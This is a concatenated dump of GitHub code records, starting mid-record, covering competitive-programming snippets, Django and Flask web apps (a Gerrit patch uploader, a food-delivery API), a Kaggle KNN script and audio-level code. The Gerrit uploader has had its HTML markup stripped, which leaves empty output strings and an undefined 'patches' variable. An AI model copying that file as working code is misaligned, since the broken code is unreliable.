Basics/conditional_statements-exercise/godzilla_vs_kong.py","file_name":"godzilla_vs_kong.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12664572565","text":"import math\nimport datetime\nimport collections\nimport statistics\nimport itertools\nfrom collections import Counter\n\n\ndef is_prime(num):\n for i in range(2, int(math.sqrt(num)) + 1):\n if num % i == 0:\n return False\n return True\n\n\ndef input_list():\n ll = list(map(int, input().split(\" \")))\n return ll\n\n\ntc = int(input())\nfor _ in range(tc):\n n, m = map(int, input().split())\n ar = input_list()\n x = Counter(ar)\n c = False\n for i in range(1, m):\n if i not in x:\n print(-1)\n c = True\n break\n if not c:\n print(n - x[m])\n","repo_name":"SKAUL05/cp-snippets","sub_path":"CodeChef/#June_CookOff_MAXMEX.py","file_name":"#June_CookOff_MAXMEX.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"72169100003","text":"soma = 0\ncont = 0\nnota =[ ]\nfor i in range(0,5):\n nota.append(float(input(\"Nota:\")))\n soma = nota[i] + soma\n media = soma/5\nfor j in range(0,5):\n if nota[j] >= media:\n cont+=1\n print(nota[j])\nprint('media:',media)\nprint('qut:',cont)\n\n\n\n\n","repo_name":"ddank0/Python-ex","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4918386702","text":"from rest_framework import serializers \nfrom ...flight.models.calculation import FlightCalculation\nfrom django.db.models import Sum\n\n\nclass FlightCalculationSerializer(serializers.ModelSerializer):\n class Meta:\n model = FlightCalculation\n fields = (\n 'id',\n 'guid',\n 'flight',\n 'from_date',\n 'to_date',\n 'number_of_seat',\n 'total_amount',\n 'prepayment',\n 'remained_amount'\n )\n\n def to_representation(self, instance):\n data = super().to_representation(instance)\n data['remained_amount'] = instance.total_amount - instance.prepayment\n qs = FlightCalculation.objects.filter(flight=instance.flight)\n prepayment_sum = qs.aggregate(prepayment_sum=Sum('prepayment'))['prepayment_sum'] or 0\n remained_amount_sum = qs.aggregate(remained_amount_sum=Sum('remained_amount'))['remained_amount_sum'] or 0\n data['prepayment_sum'] = prepayment_sum\n data['remained_amount_sum'] = remained_amount_sum\n return data\n\n\n\nclass FlightCalculationCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = FlightCalculation\n fields = (\n 'flight',\n 'from_date',\n 'to_date',\n 'number_of_seat',\n 'total_amount',\n 'prepayment',\n 'remained_amount'\n )\n","repo_name":"akhad97/Parvoz-Express","sub_path":"main/apps/flight/serializer/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8278863693","text":"#!/usr/bin/env python\nimport subprocess\nimport tempfile\nimport os\nimport re\nimport pipes\nimport binascii\n\nimport jinja2\nfrom flask import Flask, render_template, request, Response, session\nfrom cachelib import FileSystemCache\nfrom flask_mwoauth import MWOAuth\n\nFILE_DIR = os.path.abspath(os.path.split(__file__)[0])\nos.chdir(FILE_DIR)\n\nimport config # noqa, needs to be loaded from local path\n\nGIT_PATH = 'git'\nPATCH_PATH = 'patch'\nRUN_ENV = {'PATH': FILE_DIR + \"/bin\", 'LANG': 'en_US.UTF-8', 'LD_LIBRARY_PATH': FILE_DIR + \"/lib\"}\n\napp = Flask(__name__)\napp.secret_key = config.app_secret_key\n\nmwoauth = MWOAuth(consumer_key=config.oauth_key, consumer_secret=config.oauth_secret)\nmwoauth.handshaker.user_agent = 'Gerrit-Patch-Uploader by valhallasw using MWOAuth - http://tools.wmflabs.org/gerrit-patch-uploader'\napp.register_blueprint(mwoauth.bp)\n\ncache = FileSystemCache('cache')\n\n\ndef get_projects():\n projects = cache.get('projects')\n if projects is None:\n p = subprocess.Popen(['ssh', 'gerrit', 'gerrit ls-projects'], stdout=subprocess.PIPE, env=RUN_ENV)\n stdout, stderr = p.communicate()\n projects = stdout.decode(\"utf-8\", \"replace\").strip().split(\"\\n\")\n cache.set('projects', projects)\n return projects\n\n\n@app.route(\"/\")\ndef index():\n author = session.get('author', '')\n return render_template('index.html', projects=get_projects(), username=mwoauth.get_current_user(),\n committer_email=config.committer_email, author=author)\n\n\n@app.route(\"/submit\", methods=[\"POST\"])\ndef submit():\n user = mwoauth.get_current_user(False)\n if not user:\n return \"Must be logged in\"\n\n if request.method != 'POST':\n return \"can only POST\"\n project = request.form['project']\n if project not in get_projects():\n return \"project unknown\"\n committer = request.form['committer']\n if not committer:\n return 'committer not set'\n session['author'] = committer\n message = request.form['message']\n if not message:\n return 'message not set'\n\n if 'fpatch' in request.files:\n patch = request.files['fpatch'].stream.read()\n if not patch:\n patch = request.form['patch'].replace(\"\\r\\n\", \"\\n\").encode('utf-8')\n if not patch:\n return 'patch not set'\n\n note = \"\"\"This commit was uploaded using the Gerrit Patch Uploader [1].\n\nPlease contact the patch author, %s, for questions/improvements.\n\n[1] https://tools.wmflabs.org/gerrit-patch-uploader/\"\"\" % committer\n\n return Response(jinja2.escape(e) for e in apply_and_upload(user, project, committer, message, patch, note))\n\n\ndef prepare_message(message):\n message = message.replace(\"\\r\\n\", \"\\n\")\n message = message.split(\"\\n\")\n\n if not message[-1].startswith('Change-Id: '):\n if not re.match(r\"[a-zA-Z\\-]+: \", message[-1]):\n message.append(\"\")\n message.append('Change-Id: I%s' % binascii.b2a_hex(os.urandom(20)).decode('ascii'))\n\n return \"\\n\".join(message) + \"\\n\"\n\n\ndef apply_and_upload(user, project, committer, message, patch, note=None):\n yield jinja2.Markup(\"Result from uploading patch:


\")\n\n with tempfile.TemporaryDirectory() as tempd:\n def run_command(cmd, *, stdin=None, stdin_name=None):\n yield jinja2.Markup(\"\")\n yield \" \".join(cmd)\n if stdin_name:\n yield \" < \" + stdin_name\n elif stdin:\n yield jinja2.Markup(\"\\n
\")\n yield stdin.decode('utf-8', 'replace')\n yield jinja2.Markup(\"
\")\n\n yield jinja2.Markup(\"
\\n
\")\n p = subprocess.Popen(\n cmd,\n stdin=subprocess.PIPE if stdin else None,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=tempd,\n env=RUN_ENV)\n\n stdout = p.communicate(stdin)[0].replace(b\"\\x1b[K\", b\"\").decode('utf-8', 'replace')\n yield stdout\n yield jinja2.Markup(\"
\")\n\n return p, stdout\n\n try:\n p, _ = yield from run_command(\n [GIT_PATH, 'clone', \"-v\", \"-v\", '--depth=1', 'ssh://gerrit/' + project, tempd])\n if p.returncode != 0:\n raise Exception(\"Clone failed\")\n\n p, stdout = yield from run_command(\n [GIT_PATH, 'rev-parse', '--abbrev-ref', 'HEAD'])\n if p.returncode != 0:\n raise Exception(\"Could not determine branch\")\n\n branch = stdout.strip()\n\n p, _ = yield from run_command(\n [GIT_PATH, 'config', 'user.name', '[[mw:User:%s]]' % user])\n if p.returncode != 0:\n raise Exception(\"Git Config failed (should never happen)!\")\n\n p, _ = yield from run_command(\n [GIT_PATH, 'config', 'user.email', config.committer_email])\n if p.returncode != 0:\n raise Exception(\"Git Config failed (should never happen)!\")\n\n patch_commands = [\n [GIT_PATH, \"apply\"],\n [PATCH_PATH, \"--no-backup-if-mismatch\", \"-p0\", \"-u\"],\n [PATCH_PATH, \"--no-backup-if-mismatch\", \"-p1\", \"-u\"],\n ]\n for pc in patch_commands:\n p, _ = yield from run_command(pc, stdin=patch, stdin_name=\"patch\")\n if p.returncode == 0:\n break\n\n if p.returncode != 0:\n raise Exception(\n \"Patch failed (is your patch in unified diff format, and does it patch apply cleanly to master?)\"\n )\n\n p, _ = yield from run_command(\n [GIT_PATH, \"add\", \"-A\"])\n if p.returncode != 0:\n raise Exception(\"Git add failed (were no files changed?)\")\n\n message = prepare_message(message)\n p, _ = yield from run_command(\n [GIT_PATH, \"commit\", \"-a\", \"--author=\" + committer, \"-F\", \"-\"], stdin=message.encode('utf-8'))\n if p.returncode != 0:\n raise Exception(\"Commit failed (incorrect format used for author?)\")\n\n p, stdout = yield from run_command(\n [GIT_PATH, \"rev-list\", \"-1\", \"HEAD\"])\n if p.returncode != 0:\n raise Exception(\"Could not determine commit SHA1\")\n sha1 = stdout.strip()\n\n p, pushresult = yield from run_command(\n [GIT_PATH, \"push\", \"origin\", \"HEAD:refs/for/%s\" % branch])\n if p.returncode != 0:\n raise Exception(\"Push failed\")\n\n yield jinja2.Markup(\"

\")\n\n yield \"Uploaded patches:\"\n yield jinja2.Markup(\"\")\n\n if note:\n yield jinja2.Markup(\"
Submitting note: %s

\") % note\n note = pipes.quote(note)\n sha1 = pipes.quote(sha1)\n p = subprocess.Popen(\n [\"ssh\", \"gerrit\", \"gerrit review %s -m %s\" % (sha1, note)],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n cwd=tempd,\n env=RUN_ENV)\n p.communicate()\n if p.returncode != 0:\n raise Exception(\"Note could not be submitted correctly\")\n\n if len(patches) == 1:\n yield \"Automatically redirecting in 5 seconds...\"\n yield jinja2.Markup('') % (patch,)\n except Exception as e:\n yield jinja2.Markup(\"\")\n yield jinja2.Markup(\"Upload failed
\")\n yield jinja2.Markup(\"Reason: %s (check log above for details)\") % e\n\n import traceback\n traceback.print_exc()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"valhallasw/gerrit-patch-uploader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"71865964322","text":"from bottle import response, redirect\r\nfrom functools import wraps\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def wrapper(session, db=None):\r\n params={\r\n 'session': session\r\n }\r\n \r\n if db:\r\n params['db'] = db\r\n\r\n if(session['user']):\r\n return f(**params)\r\n else:\r\n response.flash({'message': 'Usuário não esta autorizado a acessa essa requisição.', 'code': 'danger'})\r\n return redirect('login')\r\n\r\n return wrapper","repo_name":"janerbastos/bottle-app","sub_path":"core/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72312237280","text":"from django import template\nfrom sellmo import modules\nfrom sellmo.core import indexing\n\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\n\n\nregister = template.Library()\n\n\nclass CategoryBrandsTag(Tag):\n name = 'categorybrands'\n options = Options(\n Argument('category'),\n 'as',\n Argument('varname', default='brands', required=False, resolve=False),\n blocks=[\n ('endcategorybrands', 'nodelist')\n ],\n )\n\n def get_brands(self, category):\n index = indexing.indexer.get_index('product')\n if index.has_field('categories') and index.has_field('attr_brand'):\n brands = index.search().filter(categories__in=category.get_descendants(include_self=True))\n brands = brands.with_fields('attr_brand')\n return [obj['attr_brand'] for obj in brands.values()]\n else:\n return []\n\n def render_tag(self, context, category, varname, nodelist):\n context.push()\n context[varname] = self.get_brands(category)\n output = nodelist.render(context)\n context.pop()\n return output\n\n\nregister.tag(CategoryBrandsTag)\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/adaptivdesign/django-sellmo/skeleton/brand/templatetags/brand.py","file_name":"brand.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2497507685","text":"#Without argpartition Script with all features used took 4 days but with argpartition it executes in 3 hours on Core 2 Duo\n\n#Best Value of K\n\n# Prime Nearest Number(Number of Features)^1/2 With K as a random guess...\n\n#This is Sample Script\nimport pandas as pd\nimport os\nimport numpy as np\n\nos.system(\"ls ../input\")\n\ndata = pd.read_csv(\"../input/train.csv\")\ndata.describe()\ndata.columns\n\n\nX=np.asarray(data.ix[:,1:-1].dropna(),dtype=np.float32)\nprint (X.shape)\nY=np.asarray(data.ix[:,-1])\nprint (Y, Y.shape, len(np.unique(Y))) # so we have 9 classes...\n\n#print(\"Training set has {0[0]} rows and {0[1]} columns\".format(train.shape))\n\n#print(train.head())\n#datatest=pd.read_csv('../input/test.csv')\n#ids=np.array(datatest['id'])\n#Xtest=np.array(datatest.ix[:,1:].values,dtype=np.float32)\n\n#feat=np.arange(X.shape[1])\n#knn1=KNearestNeighbor(11)# Prime 93^1/2 With K as a random guess...\n#knn1.train(X[:,feat],Y)\n#pclassesNewWith11=knn1.predict(Xtest[:,feat])\n\n# value of K if used 11 or 7 the best possible accuracy with KNN can be achieved. ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/otto-group-product-classification-challenge/Sandeep Charan/knn-argpartition-and-value-of-k.py","file_name":"knn-argpartition-and-value-of-k.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"22854023443","text":"import os\nimport urllib\nimport uuid\n\nimport requests\nfrom flask import Flask, request\nfrom flask_cors import CORS\nimport json\nimport random\nimport sqlite3\nimport time\n\napp = Flask(__name__)\nCORS(app)\n\nUSER_ID = '1'\n\n\ndef get_cursor():\n connection = sqlite3.connect(\"database.db\")\n c = connection.cursor()\n return c\n\n\ndef init_db():\n c = get_cursor()\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS meals(\n id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\n title text,\n available int,\n picture text,\n price real,\n category integer\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS promocodes(\n id integer PRIMARY KEY,\n code text,\n discount real\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS users(\n id integer PRIMARY KEY,\n promocode text,\n name text,\n address text,\n phone text,\n orders text\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS promotions(\n id integer PRIMARY KEY,\n title text,\n description text\n )\n \"\"\")\n\n c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS orders(\n id text PRIMARY KEY,\n ordered real,\n meals text,\n summ real,\n status text,\n address text,\n user_id int \n )\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promocodes VALUES (1, \"stepik\", 15.0)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promocodes VALUES (2, \"delivery\", 10.0)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO users VALUES (1, null, \"Mary Swan\", \"Saint Petersburg\", null, null)\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (1, \"Get discount if you study with Stepik\", \"Discount 15% with STEPIK promocode\")\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (2, \"Get you discount if you love to eat\", \"Discount 10% with DELIVERY promocode\")\n \"\"\")\n\n c.execute(\"\"\"\n INSERT INTO promotions VALUES (3, \"Get you discount if you love to drink\", \"Discount 5% for all drinks\")\n \"\"\")\n\n c.connection.commit()\n c.connection.close()\n\n\ndef fill_database():\n api_key = \"7ee1cc6c2e4d5ecf10b9ab99b16c7e16\"\n key_words = \"cheese\"\n page = 1\n params = {\"key\": api_key, \"q\": key_words, \"page\": page}\n url_string = \"https://www.food2fork.com/api/search?\" + urllib.parse.urlencode(params)\n r = requests.get(url_string)\n data = r.json()\n c = get_cursor()\n for page in range(1, 5):\n for item in data['recipes']:\n c.execute(\"\"\"\n INSERT INTO meals (title, available, picture, price, category) VALUES (?, ?, ?, ?, ?)\n \"\"\", [\n item['title'],\n 1,\n item['image_url'],\n item['social_rank'] + random.randint(0, 100),\n 1\n ])\n c.connection.commit()\n c.connection.close()\n\n\nif not os.path.exists(\"database.db\"):\n init_db()\n fill_database()\n\n\ndef read_file(filename):\n opened_file = open(filename, 'r')\n data = json.loads(opened_file.read())\n opened_file.close()\n return data\n\n\ndef write_file(filename, data):\n opened_file = open(filename, 'w')\n opened_file.write(json.dumps(data))\n opened_file.close()\n\n\ndef fire_discount(price, discount):\n return price * (1.0 - discount / 100)\n\n\n@app.route(\"/alive\")\ndef alive():\n data = read_file('config.json')\n return json.dumps({\"alive\": data['alive']})\n\n\n@app.route(\"/workhours\")\ndef workhours():\n data = read_file('config.json')\n return json.dumps(data['workhours'])\n\n\n@app.route(\"/promotion\")\ndef promotion():\n promotion_number = random.randint(1, 3)\n\n c = get_cursor()\n c.execute(\"\"\"\n SELECT title, description FROM promotions WHERE id = ?\n \"\"\", (promotion_number,))\n title, description = c.fetchone()\n return json.dumps({\"title\": title, \"description\": description})\n\n\n@app.route(\"/promocode/\")\ndef promo(code):\n c = get_cursor()\n c.execute(\"\"\"\n SELECT * FROM promocodes WHERE code = ?\n \"\"\", (code,))\n\n result = c.fetchone()\n if result is None:\n return \"Invalid code\", 404\n\n promo_id, promo_code, promo_discount = result\n c.execute(\"\"\"\n UPDATE users\n SET promocode = ?\n WHERE id = ?\n \"\"\", (promo_code, int(USER_ID)))\n c.connection.commit()\n c.connection.close()\n return str(promo_discount), 200\n\n\n@app.route(\"/meals\")\ndef meals_route():\n c = get_cursor()\n c.execute(\"\"\"\n SELECT discount FROM promocodes\n WHERE code = (\n SELECT promocode FROM users\n WHERE id = ?\n )\n \"\"\", (int(USER_ID),))\n result = c.fetchone()\n\n discount = 0\n if result is not None:\n discount = result[0]\n\n meals = []\n\n for meals_info in c.execute(\"SELECT * FROM meals\"):\n meals_id, title, available, picture, price, category = meals_info\n meals.append({\n 'id': meals_id,\n 'title': title,\n 'available': bool(available),\n 'picture': picture,\n 'price': fire_discount(price, discount),\n 'category': category\n })\n\n return json.dumps(meals)\n\n\n@app.route(\"/orders\", methods=[\"GET\", \"POST\"])\ndef orders():\n c = get_cursor()\n\n if request.method == \"GET\":\n user_orders = []\n for order in c.execute(\"\"\"SELECT id, ordered, meals, summ, status, address FROM orders WHERE user_id = ?\"\"\",\n (int(USER_ID),)):\n order_id, ordered, order_meals, summ, status, address = order\n user_orders.append({\n 'id': order_id,\n 'ordered': ordered,\n 'meals': json.loads(order_meals),\n 'summ': summ,\n 'status': status,\n 'address': address\n })\n return json.dumps(user_orders)\n elif request.method == \"POST\":\n raw_data = request.data.decode(\"utf-8\")\n data = json.loads(raw_data)\n\n discount = 0\n\n key_exists = 'promocode' in data\n if key_exists:\n c.execute(\"\"\"\n SELECT discount FROM promocodes\n WHERE code = ?\n \"\"\", (data['promocode'],))\n result = c.fetchone()\n\n if result is not None: # лишняя проверка, тк если промокода нет, то в словаре нет ключа 'promocode'\n discount = result[0]\n\n summ = 0.0\n for user_meal_id in data['meals']:\n c.execute(\"\"\"SELECT price FROM meals WHERE id == ?\"\"\", (user_meal_id,))\n price = c.fetchone()[0]\n summ += fire_discount(price, discount)\n\n new_order_id = str(uuid.uuid4())\n\n address = c.execute(\"\"\"\n SELECT address FROM users\n WHERE id == ?\n \"\"\", (USER_ID))\n\n ordered = time.time() + random.randint(1800, 7200)\n new_order = [new_order_id, ordered, str(data['meals']), summ, \"ACCEPTED\", str(address), int(USER_ID)]\n\n c.execute(\"\"\"INSERT INTO orders VALUES (?, ?, ?, ?, ?, ?, ?)\"\"\", new_order)\n\n c.connection.commit()\n c.connection.close()\n\n return json.dumps({'order_id': new_order_id})\n\n\n@app.route(\"/order/\", methods=[\"DELETE\"])\ndef one_order(order_id):\n c = get_cursor()\n if c.execute(\"\"\"SELECT * FROM orders WHERE status == \"ACCEPTED\" AND id == ?\"\"\", (order_id,)).rowcount > 0:\n c.execute(\"\"\"\n UPDATE orders\n SET status = \"CANCELLED\"\n WHERE id = ?\n \"\"\", (order_id,))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n return \"False\", 404\n\n\n@app.route(\"/activeorder\", methods=[\"GET\", \"DELETE\"])\ndef activeorder():\n c = get_cursor()\n\n if request.method == \"GET\":\n return find_active_order(c)\n elif request.method == \"DELETE\":\n if find_active_order(c)[0] is not \"\":\n c.execute(\"\"\"\n UPDATE orders\n SET status = \"CANCELLED\"\n WHERE status == \"ACCEPTED\" AND user_id == ?\n \"\"\", (int(USER_ID),))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n return \"False\", 404\n\n\n@app.route(\"/profile\", methods=[\"GET\", \"PATCH\"])\ndef profile_route():\n c = get_cursor()\n\n if request.method == \"GET\":\n c.execute(\"\"\"\n SELECT name, address, phone, orders FROM users\n WHERE id == ?\n \"\"\", (int(USER_ID),))\n name, address, phone, orders = c.fetchone()\n return json.dumps({\"name\": name, \"address\": address, \"phone\": phone, \"orders\": orders})\n elif request.method == \"PATCH\":\n raw_data = request.data.decode(\"utf-8\")\n data = json.loads(raw_data)\n c.execute(\"\"\"\n UPDATE users\n SET name = ?, address = ?, phone = ?\n WHERE id == ?\n \"\"\", (data['name'], data['address'], data['phone'], USER_ID))\n c.connection.commit()\n c.connection.close()\n return \"True\"\n else:\n return \"False\"\n\n\n@app.route(\"/delivers\")\ndef delivers():\n c = get_cursor()\n response = find_active_order(c)\n if response[0] is not \"\":\n return json.dumps({\"time\": int(json.loads(response)['ordered'])})\n return \"\", 404\n\n\ndef find_active_order(c):\n c.execute(\"\"\"\n SELECT id, ordered, meals, summ, status, address FROM orders\n WHERE status == \"ACCEPTED\" AND user_id == ?\n \"\"\", (int(USER_ID),))\n result = c.fetchone()\n if result is not None:\n order_id, ordered, meals, summ, status, address = result\n return json.dumps({\n 'id': order_id,\n 'ordered': ordered,\n 'meals': json.loads(meals),\n 'summ': summ,\n 'status': status,\n 'address': address\n })\n return \"\", 404\n\n\napp.run(\"0.0.0.0\", 9000)\n","repo_name":"MariaLebedeva/stepik-course-delivery-backend","sub_path":"flasks/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23503865702","text":"from django.db import models\n\n# Create your models here.\n\nMAX_UA_LENGTH = 192\n\nclass Report(models.Model):\n \n type = models.CharField(max_length=64, blank=True, null=True)\n time = models.DateTimeField(db_index=True)\n version = models.IntegerField(blank=True, null=True)\n jsondata = models.TextField(blank=True, null=True)\n comments = models.CharField(max_length=512, blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'report'\n ordering = ['time', 'gmt_create']\n get_latest_by = \"time\" # Entry.objects.latest()\n \nclass OperType(models.Model):\n \n name = models.CharField(max_length=128, null=True, blank=True)\n path = models.CharField(max_length=128, db_index=True)\n method = models.CharField(max_length=16, db_index=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%s %s' % (self.method, self.path)\n \n class Meta:\n unique_together = ('path', 'method')\n db_table = 'stats_opertype'\n ordering = ['gmt_create']\n\n\nclass Oper(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_type_id = models.IntegerField(db_index=True)\n ua_id = models.IntegerField(db_index=True)\n remote_ip = models.CharField(max_length=128, null=True, blank=True)\n meta = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'id:%s performs action:%d' % (self.user_id, self.oper_type_id)\n\n class Meta:\n db_table = 'stats_oper'\n ordering = ['gmt_create']\n\nclass OperRaw(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_id = models.IntegerField(db_index=True)\n request = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%d' % self.oper_id\n \n class Meta:\n db_table = 'stats_operraw'\n ordering = ['gmt_create']\n\nclass OperObject(models.Model):\n \n user_id = models.IntegerField(null=True, blank=True, db_index=True)\n oper_id = models.IntegerField(db_index=True)\n object_type = models.CharField(max_length=32, db_index=True)\n object_key = models.CharField(max_length=4096, blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'on type:%d id:%s' % (self.object_type, self.object_key)\n\n class Meta:\n db_table = 'stats_operobject'\n ordering = ['gmt_create']\n\nclass UA(models.Model):\n \n platform = models.CharField(max_length=32, db_index=True)\n os_version = models.CharField(max_length=32, db_index=True)\n majorver = models.CharField(max_length=32, db_index=True)\n minorver = models.CharField(max_length=32, db_index=True)\n browser = models.CharField(max_length=32, db_index=True)\n is_crawler = models.BooleanField()\n ua_string = models.CharField(max_length=MAX_UA_LENGTH)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n \n def __unicode__(self):\n \n return u'%s' % self.ua_string\n \n class Meta:\n unique_together = ('ua_string',)\n db_table = 'stats_ua'\n ordering = ['gmt_create']\n\nclass Aggregation(models.Model):\n\n type = models.CharField(max_length=64, db_index=True)\n time = models.DateTimeField(db_index=True)\n content = models.TextField(blank=True, null=True)\n comments = models.CharField(max_length=512)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'aggregation'\n ordering = ['time', 'gmt_create']\n get_latest_by = \"time\" # Entry.objects.latest()\n\nclass Notice(models.Model):\n\n title = models.TextField(blank=True, null=True)\n content = models.TextField(blank=True, null=True)\n group = models.IntegerField(null=True)\n users = models.TextField(blank=True, null=True)\n gmt_create = models.DateTimeField(auto_now_add=True, null=True)\n gmt_modify = models.DateTimeField(auto_now=True, null=True)\n\n class Meta:\n db_table = 'notice'\n ordering = ['gmt_create']\n get_latest_by = \"gmt_create\" # Entry.objects.latest()","repo_name":"liubida/SohukanHealth","sub_path":"SohukanHealth/statistics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"15965990675","text":"T = int(input())\n\nclass Node():\n def __init__(self, node, cnt=None):\n self.node = node\n self.cnt = cnt\n\ndef bfs(graph, start, cnt):\n global result\n visit.append(start)\n queue = [Node(start, cnt)]\n while queue:\n current = queue.pop(0)\n if current.node == g:\n result = current.cnt\n break\n for i in graph[current.node]:\n if i not in visit:\n new_cnt = current.cnt + 1\n queue.append(Node(i, new_cnt))\n visit.append(i)\n\nfor test_case in range(1,T+1):\n graph = dict()\n v, e = list(map(int, input().split()))\n result = 0\n visit = []\n\n #graph initialize\n for i in range(v):\n graph[str(i+1)] = []\n\n #Links alocated by input value\n for _ in range(e):\n key, val = input().split()\n graph[key].append(val)\n graph[val].append(key)\n\n s, g = input().split()\n\n bfs(graph, s, 0)\n print(\"#{} {}\".format(test_case, result))\n \n","repo_name":"Youngjae-park/Study-Algorithm","sub_path":"node_distance.py","file_name":"node_distance.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12055707212","text":"import pyaudio\nimport audioop\nimport numpy as np\nimport time\n# initialise pyaudio get channels and rate automaticly, also set chunk size\npa = pyaudio.PyAudio()\nCHUNK = 16\nRATE = int(pa.get_device_info_by_index(2).get('defaultSampleRate'))\nCHANNELS = int(pa.get_device_info_by_index(2).get('maxInputChannels'))\nstream = pa.open(format = pyaudio.paInt16,\n channels = CHANNELS,\n rate = RATE,\n input = True,\n frames_per_buffer = 16,\n input_device_index=2)\ndef readAudio():\n audioLst = []\n # calculate the root mean square of every chunk and put it in a list. Return the average of this list\n for i in range(1000):\n data = stream.read(CHUNK, exception_on_overflow=False)\n rms = audioop.rms(data,2)\n audioLst.append((20*np.log(rms)))\n found = sum(audioLst)/len(audioLst)\n return found\n","repo_name":"Joostluijben/IDP_Feedbacklamp","sub_path":"client/hey.py","file_name":"hey.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28174994083","text":"\"\"\"Application setup\n 1) Swagger UI\n 2) API routes\n\"\"\"\nimport configs\n\nfrom flask import Flask, jsonify, request\nfrom oto import response\nfrom oto.adaptors.flask import flaskify\nfrom flasgger import Swagger\nfrom src import constants, validator\nfrom src.logic import logic\nfrom flask_cors import CORS\n\n\n# Application instance\napp = Flask(configs.API_NAME)\nCORS(app)\n\n# Swagger UI integration\napp.config['SWAGGER'] = {\n 'title': 'Flask Api - CRUD',\n 'uiversion': 2\n}\nSwagger(app, template_file=configs.SWAGGER_SPEC_PATH)\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n return response.create_fatal_response(\n constants.ERROR_MESSAGE_INTERNAL_ERROR)\n\n\n@app.route(configs.BASE_PATH + '/hello', methods=['GET'])\n@validator.authorization(request)\ndef health():\n \"\"\"Check the health of the application.\n :return: Status of application.\n \"\"\"\n return jsonify({'status': 'ok'})\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['GET'])\n@validator.authorization(request)\ndef get_department(department_id):\n \"\"\"Get the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Department details against the given department id.\n \"\"\"\n return flaskify(logic.get_department(department_id))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['GET'])\n@validator.authorization(request)\ndef get_employee(employee_id):\n \"\"\"Get the employee details against the given employee id.\n :param employee_id: str - Unique identification of department.\n :return: Employee details against the given employee id.\n \"\"\"\n return 